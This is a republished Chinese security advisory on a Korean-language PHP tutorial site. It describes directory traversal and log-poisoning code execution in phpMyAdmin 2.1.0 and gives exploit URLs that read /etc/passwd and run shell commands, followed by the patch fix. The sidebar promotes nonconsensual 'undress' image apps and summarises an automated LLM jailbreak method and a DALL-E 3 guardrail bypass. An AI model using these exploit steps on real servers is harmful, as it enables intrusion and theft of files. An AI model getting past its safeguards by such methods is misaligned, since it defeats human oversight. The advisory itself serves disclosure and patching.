phpMyAdmin2.1.0存在两个漏洞_PHP-PHP 튜토리얼-php.cn

집

백엔드 개발

PHP 튜토리얼

phpMyAdmin2.1.0存在两个漏洞_PHP

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB

Jun 01, 2016 pm 12:25 PM

goto 존재하다 허점

phpmyadminphpMyAdmin漏洞

phpMyAdmin ( http://www.phpwizard.net/projects/phpMyAdmin/ ) 是一款管理 MySQL 数据库的 PHP 工具，具有基于 WEB 的界面。但是发现它存在漏洞。可选择安装新发布稳定版本：
phpMyAdmin 2.2.0。

1、目录遍历漏洞

攻击者通过提供如下的 URL:

http://www.example.com/phpMyAdmin/sql.php?goto=/etc/passwd&btnDrop=No (*)

http://www.example.com/phpMyAdmin/tbl_replace.php?db=test&table=ess&goto=/etc/passwd

能非法访问系统文件

有问题的代码在：
'include($goto);' in sql.php and in tbl_replace.php.

2、执行攻击者代码漏洞

通过使用全局可写日志文件，攻击者能在受影响服务器上执行任意代码。

首先，得到 Apache 配置文件以便知道日志文件存储位置：

http://www.example.com/phpMyAdmin/sql.php?goto=/etc/apache/conf/httpd.conf&btnDrop=No
http://www.example.com/phpMyAdmin/sql.php?goto=/etc/apache/conf/srm.conf&btnDrop=No
http://www.example.com/phpMyAdmin/sql.php?goto=/etc/apache/conf/access.conf&btnDrop=No

可以看出，日志放在：
/var/log/httpd/error_log
/var/log/httpd/access_log

然后 telnet 到端口80

# telnet www.example.com 80
Trying xxx.xxx.xxx.xxx...
Connected to www.example.com.
Escape character is '^]'.
GET

^]
telnet> quit
Connection closed.
#

在 GET 请求之后，攻击者能将任意 PHP 代码上传

现在，可以用 Apache 用户身份远程运行命令了：

http://www.example.com/phpMyAdmin/sql.php?goto=/var/log/httpd/
access_log&btnDrop=No?meters=ls%20-l%20/

受影响系统：
phpMyAdmin 2.1.0

解决方案：
建议:
1.使用 phpMyAdmin 2.2.0
http://prdownloads.sourceforge.net/phpmyadmin/phpMyAdmin-2.2.0-php.tar.gz
2.用户下载安装补丁：
http://www.securereality.com.au/patches/phpMyAdmin-SecureReality.diff

摘自：52w.net

본 웹사이트의 성명

본 글의 내용은 네티즌들의 자발적인 기여로 작성되었으며, 저작권은 원저작자에게 있습니다. 본 사이트는 이에 상응하는 법적 책임을 지지 않습니다. 표절이나 침해가 의심되는 콘텐츠를 발견한 경우 admin@php.cn으로 문의하세요.

핫 AI 도구

Undresser.AI Undress

사실적인 누드 사진을 만들기 위한 AI 기반 앱

AI Clothes Remover

사진에서 옷을 제거하는 온라인 AI 도구입니다.

Undress AI Tool

무료로 이미지를 벗다

Clothoff.io

AI 옷 제거제

Video Face Swap

완전히 무료인 AI 얼굴 교환 도구를 사용하여 모든 비디오의 얼굴을 쉽게 바꾸세요!

뜨거운 도구

메모장++7.3.1

사용하기 쉬운 무료 코드 편집기

SublimeText3 중국어 버전

중국어 버전, 사용하기 매우 쉽습니다.

스튜디오 13.0.1 보내기

강력한 PHP 통합 개발 환경

드림위버 CS6

시각적 웹 개발 도구

SublimeText3 Mac 버전

신 수준의 코드 편집 소프트웨어(SublimeText3)

뜨거운 주제

Gmail 이메일의 로그인 입구는 어디에 있나요?

7621

Cakephp 튜토리얼

1389

Steam의 계정 이름 형식은 무엇입니까?

Win11 활성화 키 영구

NYT 연결 힌트와 답변

136

Related knowledge

20단계로 대형 모델을 탈옥하세요! 더 많은 '할머니 허점'이 자동으로 발견됩니다. Nov 05, 2023 pm 08:13 PM

1분 이내에 20단계를 거쳐 보안 제한을 우회하고 대형 모델을 성공적으로 탈옥할 수 있습니다! 그리고 모델의 내부 세부 사항을 알 필요가 없습니다. 두 개의 블랙박스 모델만 상호 작용하면 되며 AI는 완전히 자동으로 AI를 공격하고 위험한 내용을 말할 수 있습니다. 한때 유행했던 '할머니 허점'이 고쳐졌다는 소식을 들었습니다. 이제 '탐정 허점', '모험가 허점', '작가 허점'에 직면하면 인공지능은 어떤 대응 전략을 채택해야 할까요? 맹공격의 물결 이후 GPT-4는 참을 수 없었고, 이것이든 저것이든... 급수 시스템을 오염시킬 것이라고 직접 말했습니다. 핵심은 이것이 펜실베니아 대학 연구팀이 노출한 취약점의 작은 물결일 뿐이며, 새로 개발된 알고리즘을 사용하여 AI가 자동으로 다양한 공격 프롬프트를 생성할 수 있다는 것입니다. 연구자들은 이 방법이 기존 방법보다 낫다고 말합니다.

Java의 버퍼 오버플로 취약점과 그 피해 Aug 09, 2023 pm 05:57 PM

Java의 버퍼 오버플로 취약점과 그 피해 버퍼 오버플로는 버퍼에 용량보다 많은 데이터를 쓰면 데이터가 다른 메모리 영역으로 오버플로되는 것을 의미합니다. 이러한 오버플로 동작은 종종 해커에 의해 악용되어 비정상적인 코드 실행 및 시스템 충돌과 같은 심각한 결과를 초래할 수 있습니다. 이 기사에서는 Java의 버퍼 오버플로 취약점과 그 피해를 소개하고 독자의 이해를 돕기 위해 코드 예제를 제공합니다. Java에서 널리 사용되는 버퍼 클래스에는 ByteBuffer, CharBuffer 및 ShortB가 있습니다.

PHP 언어 개발에서 일반적인 파일 업로드 취약점을 해결하는 방법은 무엇입니까? Jun 10, 2023 am 11:10 AM

웹 애플리케이션 개발에 있어서 파일 업로드 기능은 기본적인 요구사항이 되었습니다. 이 기능을 사용하면 사용자는 자신의 파일을 서버에 업로드한 다음 서버에서 저장하거나 처리할 수 있습니다. 그러나 이 기능으로 인해 개발자는 보안 취약점인 파일 업로드 취약점에 더 많은 주의를 기울여야 합니다. 공격자는 악성 파일을 업로드하여 서버를 공격할 수 있으며, 이로 인해 서버는 다양한 수준의 손상을 입을 수 있습니다. PHP 언어는 웹 개발에 널리 사용되는 언어 중 하나이며 파일 업로드 취약점도 일반적인 보안 문제 중 하나입니다. 이 글에서 소개할

Java의 쉼표 연산자 취약점 및 보호 조치 Aug 10, 2023 pm 02:21 PM

Java의 쉼표 연산자 취약점 및 방어 조치 개요: Java 프로그래밍에서는 쉼표 연산자를 사용하여 동시에 여러 작업을 수행하는 경우가 많습니다. 그러나 때로는 예상치 못한 결과를 초래할 수 있는 쉼표 연산자의 잠재적인 취약점을 간과할 수도 있습니다. 이 기사에서는 Java의 쉼표 연산자의 취약점을 소개하고 해당 보호 조치를 제공합니다. 쉼표 연산자의 사용법: Java에서 쉼표 연산자의 구문은 expr1, expr2이며 이는 시퀀스 연산자라고 할 수 있습니다. 그 기능은 먼저 ex를 계산하는 것입니다.

OpenAI DALL-E 3 모델에는 '부적절한 콘텐츠'를 생성하는 취약점이 있습니다. Microsoft 직원이 이를 신고하여 '개그 명령'을 받았습니다. Feb 04, 2024 pm 02:40 PM

2일(현지시간) 뉴스에 따르면 마이크로소프트(MS) 소프트웨어 엔지니어링 부서 관리자 셰인 존스(Shane Jones)는 최근 오픈AI(OpenAI)의 DALL-E3 모델에서 일련의 부적절한 콘텐츠를 생성할 수 있는 취약점을 발견했다. Shane Jones는 회사에 취약점을 보고했지만 이를 기밀로 유지해 달라는 요청을 받았습니다. 그러나 그는 결국 취약점을 외부 세계에 공개하기로 결정했습니다. ▲ 이미지 출처: ShaneJones가 공개한 보고서. 이 웹사이트는 ShaneJones가 작년 12월 독립적인 연구를 통해 OpenAI 텍스트 생성 이미지의 DALL-E3 모델에 취약점이 있음을 발견했다는 사실을 알렸습니다. 이 취약점은 AI 가드레일(AIGuardrail)을 우회하여 일련의 NSFW 부적절한 콘텐츠를 생성할 수 있습니다. 이 발견은 광범위한 관심을 끌었습니다.

Python에서 포인터란 무엇입니까? Python에 포인터가 존재합니까? Aug 19, 2023 am 11:09 AM

C 또는 C++와 같은 저수준 프로그래밍 언어는 포인터를 사용하여 메모리를 직접 조작하는 경우가 많습니다. 효율적인 메모리 관리와 낮은 수준의 데이터 작업이 가능합니다. 메모리 관리의 낮은 수준의 복잡성은 고급 언어인 Python에서 추상화됩니다. 이 때문에 Python에는 Cor C++와 다른 방식으로 표현 포인터가 부족합니다. 대안으로 Python은 회사의 아이디어를 사용합니다.

C언어에서 goto문의 의미는 무엇인가요? Dec 22, 2022 pm 06:00 PM

C 언어에서 goto 문은 무조건 전송 문이라고 하며, 동일한 함수 내에서 레이블이 지정된 문으로 무조건 제어를 전송할 수 있습니다. 구문은 "goto label;...label: 문;"입니다. C를 제외한 모든 것 C 프로그램에서 goto 문 앞이나 뒤에 설정할 수 있는 키워드 이외의 일반 텍스트입니다.

Lenovo는 지난 5월 패치를 발표했으며 Phoenix UEFI 펌웨어 취약점이 공개되었습니다: 수백 개의 Intel PC CPU 모델에 영향을 미칩니다 Jun 22, 2024 am 10:27 AM

6월 21일 이 사이트의 뉴스에 따르면 Phoenix Secure Core UEFI 펌웨어는 수백 대의 Intel CPU 장치에 영향을 미치는 보안 취약성에 노출되었습니다. Lenovo는 이 취약성을 수정하기 위한 새로운 펌웨어 업데이트를 출시했습니다. 이 사이트는 Phoenix UEFI 펌웨어의 TPM(신뢰할 수 있는 플랫폼 모듈) 구성에 존재하는 "UEFICANHAZBUFFEROVERFLOW"로 알려진 취약점 추적 번호가 CVE-2024-0762라는 보고를 통해 알아냈습니다. 이는 악용될 수 있는 버퍼 오버플로 취약점입니다. 취약한 장치에서 임의의 코드를 실행합니다. 이 취약점은 Lenovo ThinkPad X1 Carbon 7세대 및 X1Yoga 4세대에서 Eclypsium에 의해 발견되었습니다.

See all articles